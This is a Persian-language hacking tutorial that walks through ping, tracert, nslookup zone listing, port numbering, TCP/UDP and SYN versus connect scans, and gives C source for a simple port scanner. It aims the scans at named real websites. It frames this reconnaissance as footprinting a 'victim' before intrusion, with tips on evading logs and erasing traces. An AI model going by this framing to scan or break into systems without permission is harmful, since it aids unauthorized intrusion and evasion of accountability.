Pinging prdev.com [63.148.227.65] with 32 bytes of data:

Reply from 63.148.227.65: bytes=32 time=1402ms TTL=105
Reply from 63.148.227.65: bytes=32 time=941ms TTL=105
Reply from 63.148.227.65: bytes=32 time=981ms TTL=105
Reply from 63.148.227.65: bytes=32 time=851ms TTL=105

Ping statistics for 63.148.227.65:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 851ms, Maximum = 1402ms, Average = 1043ms
اين نتايج نشان می‌دهد که prdev.com فعال است.

حالا به کامپيوتری با ip شماره 63.148.227.65 (که همان prdev.com است)، ping می‌کنم. نتايج همان است فقط با تغييراتی در سطر اول. (البته time که معنای مدت زمان رسيدن پکت را می‌دهد، با توجه به ترافيک شبکه، کم و زياد خواهد شد). برای ping کردن به اين ip ، دستور 63.148.227.65 ping را صادر می‌کنم :
Pinging 63.148.227.65 with 32 bytes of data:

Reply from 63.148.227.65: bytes=32 time=861ms TTL=105
Reply from 63.148.227.65: bytes=32 time=852ms TTL=105
Reply from 63.148.227.65: bytes=32 time=851ms TTL=105
Reply from 63.148.227.65: bytes=32 time=881ms TTL=105

Ping statistics for 63.148.227.65:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 851ms, Maximum = 881ms, Average = 861ms
فرض کنيد که به يک ip که فعال نيست، ping کنيم:
Pinging 217.66.196.1 with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 217.66.196.1:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
که نشان می‌دهد که آن ip در آن لحظه فعال نيست.

البته تمام مطالبی که در بالا ذکر شد، در حالتی است که مستقيما به اينترنت وصل شده‌ايد و يا اگر از طريق شبکه محلی به اينترنت وصل هستيد، شبکه شما به درستی پيکربندی شده باشد. اصولا ping يکی از بهترين دستورات برای پيدا کردن ايراد در شبکه است.


◊ tracert چيست ؟

tracert ( در يونيکس می‌شود traceroute ) ابزاری است که نشان می‌دهد که يک packet اطلاعاتی از کامپيوتر شما چه مسيری را طی می‌کند و از چه کامپيوترهايی می‌گذرد تا به يک مقصد خاص برسد. مقصد را ما مشخص می‌کنيم و معمولا همان کامپيوتری است که داريم footprinting می‌کنيم.

کاربرد اين دستور به صورت زير است:
tracert ip-or-domain
مثلا می‌خواهم ببينم که از چه کامپيوترهايی بايد رد شويم تا به prdev.com برسيم. برای اينکار می‌توان از يکی از دستورهای زير استفاده کرد:
tracert prdev.com
tracert 63.148.227.65
به نتيجه زير رسيدم:

Tracing route to prdev.com [63.148.227.65]
over a maximum of 30 hops:

1 160 ms 160 ms 160 ms 217.218.84.3
2 381 ms 691 ms 1772 ms 217.218.84.5
3 * * 2324 ms 217.218.77.1
4 201 ms 1101 ms 180 ms 217.218.0.252
5 341 ms 220 ms 180 ms 217.218.0.2
6 1993 ms 180 ms 181 ms 217.218.158.41
7 180 ms 160 ms 160 ms 195.146.63.101
8 2824 ms * * 195.146.32.134
9 1472 ms 1463 ms 871 ms 195.146.33.73
10 791 ms 841 ms 811 ms if-1....eglobe.net [207.45.218.161]
11 1692 ms * 2654 ms if-4-....eglobe.net [207.45.222.77]
12 1282 ms 891 ms 1052 ms if-1-....globe.net [207.45.220.245]
13 902 ms 931 ms 881 ms if-15.....globe.net [66.110.8.134]
14 931 ms 861 ms 871 ms if-8-....leglobe.net [64.86.83.174]
15 901 ms 841 ms 852 ms if-5-.....globe.net [207.45.223.62]
16 841 ms 862 ms 851 ms pos6-.....vel3.net [209.0.227.33]
17 841 ms 842 ms 941 ms so-4-1.....vel3.net [209.247.10.205]
18 882 ms 931 ms 851 ms so-0-1....vel3.net [209.247.11.197]
19 871 ms 891 ms 951 ms gige9....vel3.net [209.247.11.210]
20 1011 ms 851 ms 902 ms unknown.Level3.net [63.208.0.94]
21 852 ms * 882 ms 64.156.25.74
22 961 ms 942 ms 841 ms 63.148.227.65

Trace complete.
اين نتايج نشان می‌دهد که بايد از ۲۲ کامپيوتر بگذرم تا به prdev.com برسم. اين اطلاعات همان‌طور که بعدا خواهيد ديد، حاوی اطلاعات زيادی برای پيدا کردن فايروال‌ها و ... است. (بعضی سطرها رو کوتاه کردم و به‌جاش .... گذاشتم)


tracert دارای تعدادی switch است که دوتاش رو توضيح می‌دم:

d- == >

با استفاده از اين سويچ در نتايج حاصله فقط ip ها نمايش داده می‌شود.
مثلا می‌نويسيم:

tracert prdev.com -d
h max-hops- ==>

حداکثر تعداد گام‌ها را تعيين می‌کند. حالت پيش‌فرض ۳۰ است.
مثلا می‌نويسيم: tracert prdev.com -h 50



از اين دستور بعدا بسيار استفاده خواهيم کرد.

درس شماره 7

- خلاصه درس: در اين درس يک Port Scanner ساده به اسم acw_spscan به زبان C می‌نويسيم. درک مطالب اين درس نياز به آشنايی با زبان برنامه‌نويسی C دارد.


◊ يادآوری

قبلا گفتم که برای اينکه هکر خوبی بشيد، زبان C را بايد ياد بگيريد. امروز اولين برنامه اينترنتی خود را به زبان C شروع می‌کنيم.برنامه‌ای که امروز می‌نويسيم، يک پورت اسکنر ساده (Simple Port Scanner) است که acw_spscan.exe نام دارد. acw يعنی Artawill Commandline Windows و spscan يعنی Simple Port Scanner. من سورس اين برنامه را با Borland C++ 5.02 کامپايل کردم ولی فکر کنم روی هر نوع کامپايلر C ويندوز کار کند.
يک سری نکات در مورد هر برنامه‌ای که با C برای ويندوز خواهم نوشت هست که فقط امروز می‌گم و بعدا ديگه اشاره نخواهم کرد.
۱- هر برنامه‌ای که من می‌نويسم، شامل دو فايل است که بايد داون‌لود کنيد: فايل اصلی که پسوند C يا CPP دارد و يک فايل به يکی از نامهای acw_sock.h يا agw_sock.h يا acu_sock.h ويا axu_sock.h که با توجه به نوع سيستم‌عامل (ويندوز يا يونيکس) و نوع ظاهر برنامه (خط‌ فرمان يا گرافيکی) يکی از اين چهارتا خواهد بود. اگر برنامه برای ويندوز نوشته شده است، بايد قبل از کامپايل نهايی فايل WS2_32.LIB را هم به پروژه اضافه کنيد.
۲- هر بار که برنامه جديدی خواهم نوشت فايلی که پسوند h دارد، کامل و کامل‌تر می‌شود، پس هر وقت يک فايل جديد C يا CPP داون‌لود می‌کنيد، فايل h مربوطه را هم داون‌لود کنيد.
۳- کامپايلر مورد استفاده در برنامه‌های ويندوز Borland C++ 5.02 است. اگر از کامپايلر ديگری استفاده می‌کنيد، ممکن است لازم باشد که تغييراتی اعمال کنيد.
۴- سورس تمام توابع و برنامه‌ها مشمول کپی‌ رايت است ولی استفاده از توابع در برنامه‌هايتان در صورت عدم اعمال تغييرات در سورس بلامانع است. - اينههههههه !


◊ درباره برنامه Artawill Command-prompt Windows - Simple Prot Scanner = acw_spscan

برنامه acw_spscan.exe عمل پورت اسکنينگ را به صورت tcp و udp انجام می‌دهد. همانطوری که از نامش پيداست، برای ويندوز و به‌صورت خط فرمان عمل می‌کند.



اگر در command prompt تايپ کنيد: acw_spscan ،خطوط زير چاپ می‌شود:
Artawill Command-line Windows SimplePortScanner (acw_spscan.exe) v1.0
Programmed by Araz Samadi, ArtaWill.com

Usage: acw_spscan []
بنابراين مثلا اگر بخواهم سايت پی آر دو را (که ip آن 63.148.227.65 است) برای پورت‌های ۲۰ تا ۳۰ به صورت tcp اسکن کنم، بايد بنويسم:
acw_spscan 63.148.227.65 20 30 tcp
و جواب می‌شنوم:
Artawill Command-line Windows SimplePortScanner (acw_spscan.exe) v1.0
Programmed by Araz Samadi, ArtaWill.com

>TCP
[63.148.227.65] TCP 21 : OPEN
[63.148.227.65] TCP 25 : OPEN

Simple Port Scanner End.
که نشان می‌دهد، پورت‌های ۲۱ و ۲۵ باز است.



◊ بررسی سورس برنامه

من برای راحتی کار برنامه‌نويسی شبکه، يک سری تابع تعريف کرده و آنها را در فايل acw_sock.h قرار داده‌ام که در برنامه اصلی آن را include می‌کنم. حال به بررسی توابع مورد استفاده در برنامه امروز می‌پردازم ( اگر خواهان اطلاعات بيشتری هستيد، سورس اين توابع را از فايل acw_sock.h بخوانيد ):

۱- (int arta_win_LoadWinsock(char, char ==>
در برنامه‌نويسی ويندوز قبل از استفاده از سوکت(socket)، بايد WinSock را لود کرد که من اين کار را با اين تابع انجام می‌دهم. اگر بپرسيد سوکت چيست، می‌گويم سوکت ارتباطی است از نوع TCP/IP که از پورت خاصی از يک کامپيوتر به سوی يک پورت خاص از يک کامپيوتر ديگر برای رد و بدل کردن داده‌ها ايجاد می‌شود. کل برنامه‌نويسی شبکه به کمک C با استفاده از سوکت‌هاست.

if(arta_win_LoadWinsock(2,0)==-1)
arta_commandline_win_DieWithError("ERR: Cannot load WinSock!");
دو خط بالا برای لودکردن WinSock ورژن 2.0 به‌کار می‌رود.

۲- (void arta_win_CleanWinsock(void ==>
در آخر برنامه بايد WinSockی را که با دستور بالا ايجاد کرده‌ايم، به‌کمک دستور اين قسمت ببنديم:

arta_win_CleanWinsock();


۳- (int arta_win_CreateTcpSocket(void ==>
اين تابع يک سوکت از نوع tcp ايجاد می‌کند.
if((sock=arta_win_CreateTcpSocket())==-1)
arta_commandline_win_DieWithError("ERR: Cannot Create Socket!");
دو خط بالا برای ايجاد يک سوکت tcp به‌کار می‌رود.

۴- (int arta_win_CreateUdpSocket(void ==>
اين تابع يک سوکت از نوع udp ايجاد می‌کند.

if((sock=arta_win_CreateUdpSocket())==-1)
arta_commandline_win_DieWithError("ERR: Cannot Create Socket!");
دو خط بالا برای ايجاد يک سوکت udp به‌کار می‌رود.

۵- (void arta_win_CloseSocket(int ==>
اين تابع، سوکتی را که با يکی از دو دستور بالا ايجاد کرده‌ايم، می‌بندد.
arta_win_CloseSocket(sock);


۶- void arta_win_CreateServerAddressStructure
(* struct sockaddr_in *, unsigned short, char ) ==>
اين تابع اطلاعات لازم برای برقراری اتصال را مانند IP, Port می‌گيرد و در يک structure مخصوص از نوع sockaddr_in قرار می‌دهد. اين structure در توابع بعدی به‌کار می‌رود.
arta_win_CreateServerAddressStructure(&addr,port,IP);


۷- (* int arta_win_EstablishTcpSocketConnection(int, struct sockaddr_in ==>
اين تابع sock (که از تابع‌های ۳ يا ۴ به‌دست آمده) و addr را (که از تابع ۶ حاصل شده) می‌گيرد و يک ارتباط واقعی tcp تشکيل می‌دهد. اگر ارتباط به‌وجود آمد، پورت باز است وگرنه بسته است.
if(arta_win_EstablishTcpSocketConnection(sock, &addr)==-1){
....
}


۸- (* int arta_win_EstablishUdpSocketConnection(int, struct sockaddr_in ==>
اين تابع sock (که از تابع‌های ۳ يا ۴ به‌دست آمده) و addr را (که از تابع ۶ حاصل شده) می‌گيرد و يک ارتباط واقعی udp تشکيل می‌دهد. اگر ارتباط به‌وجود آمد، پورت باز است وگرنه بسته است.
if(arta_win_EstablishUdpSocketConnection(sock, &addr)==-1){
....
}



حالا يک توضيح کلی می‌دم:

اولين سطرهای برنامه را بررسی می‌کنم
/* An ArtaWill Production - copyright(c) ArtaWill.com */
/* Programmed by: M.E */
/* This Source code and its Functions can be used - but no .... */
/* Funcions source or code can be done ! */

#include /* for printf(), fprintf() */
#include /* for exit() */
#include /* for strings */
#include "acw_sock.h"

void main(int argc, char *argv[])
{
struct sockaddr_in addr;
char *IP;
int sock;
int port;
int startport, endport;
int tcp_udp_both=1;

arta_commandline_win_StartMessage("SimplePortScanner ......");

if ((argc != 4) && (argc != 5)) /* Test for correct ...... */
{
arta_commandline_win_DieWithError("Usage: acw_spscan []\n");
exit(1);
}

IP = argv[1];
startport = atoi(argv[2]);
endport = atoi(argv[3]);
if(argc==5){
if(stricmp(argv[4],"udp")==0){tcp_udp_both=2;}
else if (stricmp(argv[4],"both")==0){tcp_udp_both=3;}
}

if(arta_win_LoadWinsock(2,0)==-1)
arta_commandline_win_DieWithError("ERR: Cannot load WinSock!");
اوايل برنامه يه‌سری توضيحات
بعدش يک سری هدر (header) را include کرده‌ام از جمله acw_sock.h را
بعدش main شروع می‌شود و يک سری تعريف متغير داريم که به نوع اين متغير ها دقت کنيد.
بعد از روی ورودی خط‌ فرمان، متغير‌ها ست می‌شوند.
دو سطر آخر هم يک WinSock لود می‌کند.

حالا ادامه:

if(tcp_udp_both!=2){ puts(">TCP");
for(port=startport;port<=endport;port++){
printf(" [%s] TCP %5d : Testing... ",IP,port);

if((sock=arta_win_CreateTcpSocket())==-1)
arta_commandline_win_DieWithError("ERR: Cannot Crea....");

arta_win_CreateServerAddressStructure(&addr,port,IP);

if(arta_win_EstablishTcpSocketConnection(sock, &addr)==-1){
printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b........");
}
else{
printf("\b\b\b\b\b\b\b\b\b\b\b");
printf("OPEN \n");
}
arta_win_CloseSocket(sock);
}
}

اگر قرار باشد که tcp چک شود، اين خطوط اجرا می‌شوند. در اين سطرها يک اتصال tcp خاص بايد ايجاد شود و اگر اين عمل موفق بود، آن پورت باز است.

حالا ادامه برنامه:
if(tcp_udp_both!=1){
puts(">UDP ");
for(port=startport;port<=endport;port++){
printf(" [%s] UDP %5d : Testing... ",IP,port);

if((sock=arta_win_CreateUdpSocket())==-1)
arta_commandline_win_DieWithError("ERR: Cannot Cre....!");

arta_win_CreateServerAddressStructure(&addr,port,IP);

if(arta_win_EstablishUdpSocketConnection(sock, &addr)==-1){
printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b.....");
}
else{
printf("\b\b\b\b\b\b\b\b\b\b\b");
printf("OPEN \n");
}
arta_win_CloseSocket(sock);
}
}
همان کارها را ولی اين‌بار برای udp انجام می‌دهد.

و حالا آخر برنامه:
puts("\n");
arta_commandline_win_EndMessage("Simple Port Scanner");

arta_win_CloseSocket(sock);
arta_win_CleanWinsock();

exit(0);
}
در اينجا پيغام انتهايی چاپ شده و سوکت بسته می‌شود.

درس شماره 6

- خلاصه درس: انواع Scanning را مشخص می‌کنيم. بحث Port Scanning را آغاز می‌کنيم و از نرم‌افزار ipEye برای Port Scanning استفاده می‌کنيم.


◊ معمول‌ترين Scanning ها کدامند؟

دو نوع معمول Scanning وجود دارد:

۱- IP Scanning :
فرض کنيد که شما يک سری IP مربوط به يک ISP خاص را داريد و می‌خواهيد بدانيد که در اين لحظه کدام‌ها فعال (up) هستند تا فقط آنها را بررسی کنيد و نه‌ همه را. اين موضوع را بعدا توضيح می‌دم ( اين کار معمولا موقعی پيش می‌آيد که قرار است کلاينت هک کنيد و مهم نيست چه کسی باشد )

۲- Port Scanning :
در اين حالت ما IP يا IPهای مورد نظر را انتخاب کرده‌ايم و حالا می‌خواهيم بدانيم که کدام پورت‌ها روی آن کامپيوترها باز است. اين کار به کمک نرم‌افزارهای خاصی انجام می‌شود که مبحث امروز ماست.


◊ چگونه يک ارتباط TCP برقرار می‌شود که بگوييم فلان پورت باز است يا نه؟

برای اينکه تعيين کنيم که يک پورت روی يک سرور باز است يا نه، معمولا بايد يک TCP connect scan انجام دهيم. اول اين را بگم که Port Scanning انواع مختلف دارد که فعلا ما نوع TCP connect را مدنظر داريم. اين نوع اسکن سه مرحله دارد که به آن TCPs 3-way handshakeمی‌گويند:
۱- اول کامپيوتر ما به سمت سرور يک SYN packet می‌فرستد که به معنی درخواست اتصال است.
۲- اگر سرور اين درخواست را قبول کند، در مرحله دوم سرور به سمت ما يک SYN/ACK packet می‌فرستد.
۳- در مرحله آخر کامپيوتر ما يک ACK packet به سمت سرور می‌فرستد.

نوع ديگری از پورت اسکن TCP SYN scan نام دارد. با توجه به اينکه معمولا اگر پورت اسکن به روش بالا (TCP connect scan) انجام دهيم، معمولا در سرور اين اتصال ذخيره خواهد شد و بعدا می‌تواند ما را رديابی کنند، به جای آن می‌توان از TCP SYN scan استفاده کرد. در اين نوع اسکن، مراحل ۱ و ۲ از بالا انجام می‌شود ولی مرحله ۳ نه! اگر در مرحله ۲ به ما يک SYN/ACK برسد، آن پورت باز است و اگر يک RST/ACK برسد، يعنی بسته است.

انواع ديگری از پورت اسکنينگ هم وجود دارد مثل UDP scan, TCP Window scan, TCP ACK scan, TCP Null, TCP Xmas Tree, TCP FIN Scan


◊ چگونه می‌توان عمل Port scanning را انجام داد؟

در تمام مطالبی که تا اين مرحله گفته‌ام سعی کرده‌ام که فقط از ابزارهای موجود در ويندوز استفاده کنم و هيچ ابزار ديگری به‌کار نبرم، اما در مبحث پورت اسکنينگ چون هيچ ابزاری در ويندوز برای اين‌ کار نيست، به‌ناچار بايد يک سری برنامه را از اينترنت داون‌لود کنيد. (توجه داشته باشيد که فعلا حرفی از لينوکس نزده‌ام و سعی می‌کنم فعلا هيچ بحثی را در مورد آن مطرح نکنم)

برای Port Scanning می‌توان از ابزارهای مختلفی استفاده کرد که اکثرا برای لينوکس طراحی شده‌اند، اما مهم‌ترين پورت اسکنرها برای ويندوز عبارتند از:

۱- نرم‌افزار NMapWin v1.3.0 :
نسخه گرافيکی و مخصوص ويندوز برای nmap است (nmap در لينوکس استفاده می‌شود). nmap از کامل‌ترين ابزارهايی است که هکر‌ها استفاده می‌کنند که علاوه بر توانايی انواع پورت اسکنينگ‌ها، می‌تواند کارهای بسياری چون تشخيص سيستم‌عامل سرور و ... را انجام دهد. اين ابزار را بعدا توضيح خواهم داد ولی فعلا برای کار ما بيش‌ از حد کامله ;-)

۲- NetScanTools Pro 2000 :
اين هم از بهترين‌هاست ولی چون پولی است به‌ جای داون‌لود بايد در CD هايی که در بازار هست پيدايش کنيد.

۳- WinScan :
برای اسکن کردن TCP (ونه UDP) می‌توانيد از آن استفاده کنيد. من زياد ازش خوشم نيومد.

۴- ipEye v1.2 :
من در این درس از اين نرم‌افزار استفاده خواهم کرد، برای داون‌لود آن می‌توانيد به سايت http://www.ntsecurity.nu/ مراجعه کنيد يا مستقيما با کليک روی اين لينک آن را داون‌لود کنيد. لازم است بگويم که اين نرم‌افزار فقط در ويندوز ۲۰۰۰ و xp کار می‌کند و نيز در يک بار اجرا فقط يک ip را می‌تواند تست کند. ضمنا فقط TCP را تست می‌کند.


◊ چگونه از ipEye برای پورت اسکنينگ استفاده کنيم؟

با تايپ ipEye در command prompt اين نتايج ظاهر می‌شود:

ipEye 1.2 - (c) 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
- http://ntsecurity.nu/toolbox/ipeye/

Error: Too few parameters.

Usage:

ipEye -p [optional parameters]
ipEye -p
[optional parameters]

is one of the following:
-syn = SYN scan
-fin = FIN scan
-null = Null scan
-xmas = Xmas scan>br>
(note: FIN, Null and Xmas scans dont work against Windows systems.

[optional parameters] are selected from the following:
-sip = source IP for the scan
-sp = source port for the scan
-d = delay between scanned ports in milliseconds
(default set to 750 ms)

فرض کنيد که می‌خواهيم سايت سازين را از نظر پورت‌ها از پورت ۱ تا ۲۰۰ تست کنيم. اول بايد ip آن را به دست بياوريم که می‌شود، 63.148.227.65 و حالا به کمک دستور زير آن را بررسی می‌کنيم:
ipeye 63.148.227.65 -syn -p 1 200
دقت کنيد که 63.148.227.65 عدد ip سازين، syn- يعنی SYN SCAN و p 1 200- يعنی تست از پورت ۱ تا ۲۰۰ باشد. البته پارامترهای ديگری را هم می‌شود ست کرد که فعلا به درد ما نمی‌خورد. با اجرای اين دستور به نتايج زير می‌رسيم:
ipEye 1.2 - (c) 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
- http://ntsecurity.nu/toolbox/ipeye/

1-20 [drop]
21 [open]
22 [closed or reject]
23-24 [drop]
25 [open]
26-52 [drop]
53 [open]
54-79 [drop]
80 [open]
81-109 [drop]
110 [open]
111-142 [drop]
143 [open]
144-200 [drop]
201-65535 [not scanned]
Closed يعنی کامپيوتر در آن طرف هست ولی به پورت گوش نمی‌دهد، Reject يعنی اينکه يک firewall هست که اجازه اتصال به آن پورت را نمی‌دهد، Drop يعنی اينکه يک firewall همه‌چيز را پس‌ می‌زند و يا اصلا کامپيوتری اونور نيست، Open هم که يعنی باز.
در مورد سازين می‌بينيد که از بين پورت‌های ۱ تا ۲۰۰ ، پورت‌های ۲۱، ۲۵، ۵۳، ۸۰، ۱۱۰، ۱۴۳ باز است و می‌توان به‌ آنها telnet کرد. دقت کنيد که تا تمام پورت‌هايی که مشخص شده، تست نشده است، هيچ نتيجه‌ای نشان داده نمی‌شود و يه‌کم صبر می‌خواد.

درس شماره ۶

- خلاصه درس: nslookup را بررسی می‌کنيم. پورت‌ها را تقسيم‌بندی می‌کنيم و TCP و UDP را مورد بررسی قرار می‌دهيم.


◊ چگونگی استفاده از nslookup

وقتی که DNS Server يک سايت را به‌دست آورده باشيم (از طريق whois )، به کمک دستور nslookup مي‌توان اطلاعاتی اضافی در مورد آن سايت پيدا کرد. طريقه استفاده اين دستور به صورت زير است:
فرض کنيد که من می‌خواهم از Domain Server سايت خودم (far30.com) اطلاعاتی به‌دست بيارم. اگر به اين سايت whois کنم، می‌بينم که دوتا Name Server يا DNS Server دارد:
s1.prdev.com
s2.prdev.com
حالا ديگر آدرس DNS Server مربوط به far30.com را دارم و می‌توانم شروع کنم:

۱- دستور nslookup را در command prompt نوشته و اجرا می‌کنم:
C:\>nslookup
و نتايج را می‌بينم:
*** Cant find server name for address 192.168.20.3: Non-exi...
*** Cant find server name for address 192.168.20.1: Non-exi...
*** Default servers are not available
Default Server: UnKnown
Address: 192.168.20.3

>
علامت > يعنی شما می‌توانيد دستورات را تايپ کنيد.

۲- در جلوی علامت < دستور زير را تايپ می‌کنيم:
> server dns_server
که به جای dns_server بايد آدرس DNS Server سايت موردنظر را بنويسم. پس برای سايت far30.com می‌شود:
> server s1.prdev.com
و جواب می‌شنوم:
Default Server: s1.prdev.com
Address: 63.148.227.63
اگر در اين مرحله پيغام خطا می‌گيريد، بايد دوباره اين دستور را تايپ کنيد و نيز می‌توانيد از DNS Server دومی که در whois برای far30.com به‌دست آورديم ، استفاده کنيم.

۳- دستور زير را تايپ کنيد:
> set type=any

۴- حالا به کمک دستور زير اطلاعات را به‌دست می‌آوريم:
> ls -d site_name .
که برای far30.com می‌شود:
>ls -d far30.com.
دقت کنيد که بعد از اسم سايت يک نقطه (dot) گذاشته‌ام، شما هم بهتر است اينطوری بنويسيد.
نتايج زير حاصل می‌شود:
[s1.prdev.com]
far30.com. SOA s1.prdev.com admin.prdev.com.
(2002070412 3600 600 86400 3600)
far30.com. A 63.148.227.65
far30.com. NS s1.prdev.com
far30.com. NS s2.prdev.com
far30.com. MX 10 mail.far30.com
far30.com. MX 15 far30.com
ftp CNAME far30.com
mail A 63.148.227.65
www CNAME far30.com
far30.com. SOA s1.prdev.com admin.prdev.com.
(2002070412 3600 600 86400 3600)
>
بعدا در مورد کاربرد تک‌تک اينها صحبت خواهم کرد ولی بعضی از آنها همين‌طوری هم اطلاعات واضحی دارند.

۵- دستور exit را مقابل < تايپ کرده و از nslookup خارج می‌شويم.


شما برای تمرين همين کار را در مورد سايت neda.net.ir انجام دهيد.


◊ تقسيم‌بندی پورت‌ها از روی شماره آنها

۱- پورت‌های 0 تا 1023 :
مشهورترين پورت‌ها هستند و معمولا هرکدام برای يک سرويس خاص استفاده می‌شود. با تعدادی از اين پورت‌ها در جلسات قبل آشنا شده‌ايد.

۲- پورت‌های 1024 تا 49151 :
اين سری از پورت‌ها مشخصا با هيچ‌يک از سرويس‌های اينترنتی مرتبط نيستند بلکه وقتی که با يک ابزار شبکه مانند مرورگر اينترنت(مثل Internet Explore يا Netscape Navigator )، نرم‌افزار ارسال و دريافت E-mail (مثل Outlook يا Edura )، نرم‌افزارهای FTP (مثل WS-FTP يا Cute-FTP ) کار می‌کنيد، يکی از اين پورت‌ها به صورت random باز شده و يک ارتباط با سرور (با توجه به‌نوع سرويس اينترنتی که می‌دهد که يکی از پورت‌های 0 تا 1023 است) برقرار شده و داده‌ها ارسال و دريافت می‌شوند. يعنی پورت شما يکی از پورت‌های اين قسمت است و پورت سرور يکی از پورت‌های بالايی.اين سری پورت‌ها را پورت‌های register شده هم می‌گويند.

۳- پورت‌های 49152 تا 65535 :
اين سری از پورت‌ها به‌ندرت استفاده می‌شوند. کاربرد اساسی آنها برای يک سری سرويس‌های خاص اينترنتی است و يا توسط trojanها (که برای Hack کردن کامپيوتر است) است. البته خيلی از trojanهای معروف از پورت‌های رديف ۲ هم استفاده می‌کنند و اين تقسيم‌بندی‌ها هميشه برقرار نيست و به‌همين علت است که گاهی پورت‌ها را به دو‌دسته زير 1024 و بالای 1024 تقسيم‌ می‌کنند.


◊ TCP و UDP چيست؟

مدل TCP/IP که برای ارتباط اينترنتی به‌کار می‌رود، می‌توان به لايه‌های مختلفی تقسيم‌بندی کرد که بعدا بيشتر توضيح می‌دم، اما يکی از اين لايه‌ها، لايه ارتباط host2host است که خود شامل دو پروتکل است به نامهای TCP و UDP :

۱- (TCP (Transmission Control Protocol :
اين پروتکل قوی‌تر و قابل اعتمادتر است و اصولا پروتکل مهمتری نسبت به UDP محسوب می‌شود. اين پروتکل توانايی بازبينی بسته‌هاو کنترل خطا را هم دارد.

۲- (UDP (User Datagram Protocol :
اين پروتکل برای کاهش overflow طراحی شده است و در خيلی از موارد وابسته به TCP است.

نکته مهم اين است که وقتی با يک پورت خاص روی يک کامپيوتر ديگر ارتباط برقرار می‌کنيم، اين ارتباط می‌تواند از نوع TCP يا UDP باشد. بنابراين وقتی می‌خواهيم يک کامپيوتر خاصی را از نظر پورت‌ها بررسی کنيم، هردو بايد بررسی شود.

- خلاصه درس: مسير آينده را در اين درس مشخص می‌کنم. لغاتی از ديکشنری جارگون را می‌گم. بحث Footprinting را با پيدا کردن ip سايت شروع می‌کنيم.

◊ ترسيم مسير برای آينده:

۱- اولين و مهمترين تصميم انتخاب نوع کامپيوتری است که می‌خواهيد هک کنيد ( کلاينت يا سرور )، زيرا روش‌هک کردن اين‌دو بجز در مراحل ابتدايی کاملا متفاوت است.
۲- دومين گام انتخاب يک کامپيوتر مشخص (مثلا کامپيوتری که فلان سايت را نگه می‌دارد که مثالی برای کامپيوتر سرور است و يا کامپیوتر فلان شخصی که با او چت می‌کنيد که مثالی برای کامپيوتر کلاينت است) و جمع‌آوری اطلاعات در مورد آن است. اين جمع‌آوری اطلاعات از قربانی (Victim) را Footprinting گويند. اولين مشخصه‌ای که بايد کشف شود، ip اوست. يکی ديگر از اطلاعات مهم که معمولا دنبالش هستيم، پيدا کردن نوع سيستم‌عامل و نيز برنامه‌هايی است که کامپيوتر شخص از آنها بهره می‌برد. يکی از مهمترين ( و گاه خطرناک‌ترين) کارها، تست‌کردن پورت‌های آن کامپيوتر برای ديدن اينکه کدام پورت‌ها باز و کدام‌ها بسته هستند.
۳- مرحله بعدی در واقع شروع تلاش برای نفوذ به سيستم است. اين نفوذ سطوح مختلف دارد و بالاترين آن که در کامپيوترهای سرور روی می‌دهد، حالتی است که بتوان username و password مربوط به مدير کامپيوتر (administrator) يا superuser را به‌دست آورده و از طريق اين Shell Account به نهايت نفوذ دست‌ يابيم ولی گاه به‌دلايل مختلف (مربوط به سطح علمی خود و ... ) نمی‌توان به اين سطح دست‌يافت اما به هر حال برای مرحله بعدی می‌تواند استفاده شود. اين مرحله جايی است که هنر شما يه عنوان يک هکر آغاز شده و نيز به پايان می‌رسد.
۴- اين مرحله بعد از نفوذ روی می‌دهد که در آن به يک سطحی از کنترل سيستم رسيده‌ايد. رفتار شما در اين مرحله مشخص می‌کند که چه نوع هکر هستيد(سامورايی، واکر و يا کراکر) و اينکه آيا جنبه ياد گرفتن را داشته‌ايد يا نه، همينجا مشخص خواهد شد.
۵- مرحله آخر پاک کردن ردپاست تا گير نيفتيم (البته بعضی وقتها برای کلاس گذاشتن بايد گير بيفتيم، هه هه ...). بعضی از سيستم‌ها آمار login را نگه می‌دارند که در مورد آنها اين مرحله بسيار مهم است.

خلاصه مطالب بالا به اين صورت است:
Selection -> FootPrinting -> Penetration -> [Changings] -> Cleaning





◊ شروع مبحث Footprinting

گفتيم که اولين مرحله جمع‌آوری اطلاعات است که به آن FootPrinting می‌گويند. اين مبحث را با آموزش روش پيدا کردن ip شروع می‌کنيم.



◊ پيدا کردن ip يک سايت با دانستن آدرس اينترنتی

برای اين کار روشهای مختلفی هست:

۱- در (Internet Explorer (IE آدرس را تايپ کنيد و Enter را فشار دهيد. در قسمت پايين مرورگر يعنی Status Bar پس از چند لحظه برای مدت کوتاهی ip نمايش داده می‌شود و می‌توانيد آنرا يادداشت کنيد. اگر طول اين مدت بسيار کوتاه است می‌توانيد از صفحه عکس بگيريد ( با دکمه Print Screen ) و در يک نرم‌افزار گرافيکی بعد از باز کردن يک صفحه خالی به کمک Ctrl+V آنرا مشاهده کنيد. [ عجب راه احمقانه‌ای ;-)
اگر اين کار را برای www.yahoo.com انجام دهيم:



که همان شماره ip برای www.yahoo.com است.
نکته بسيار مهم اين است که به‌دليل ضريب اشتباه بسيار بالای آن هيچ‌گاه از اين روش استفاده نکنيد. نتايج ممکن است کاملا اشتباه باشد که بعدا ميگم چرا.

۲- دستور ping را در command prompt صادر کنيد:

ping domain
در اين حالت می‌توانم ip آن سايت را ملاحظه کنم. (البته کار اصلی ping يک چيز ديگست و ميشه گفت داريم ازش سوءاستفاده می‌کنيم). مثلا برای پيدا کردن ip سازين می‌نويسم:
ping sazin.com
و جواب می‌شنوم:

Pinging sazin.com [63.148.227.65] with 32 bytes of data:

Reply from 63.148.227.65: bytes=32 time=821ms TTL=111
Reply from 63.148.227.65: bytes=32 time=821ms TTL=111
Reply from 63.148.227.65: bytes=32 time=822ms TTL=111
Reply from 63.148.227.65: bytes=32 time=811ms TTL=111


Ping statistics for 63.148.227.65:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
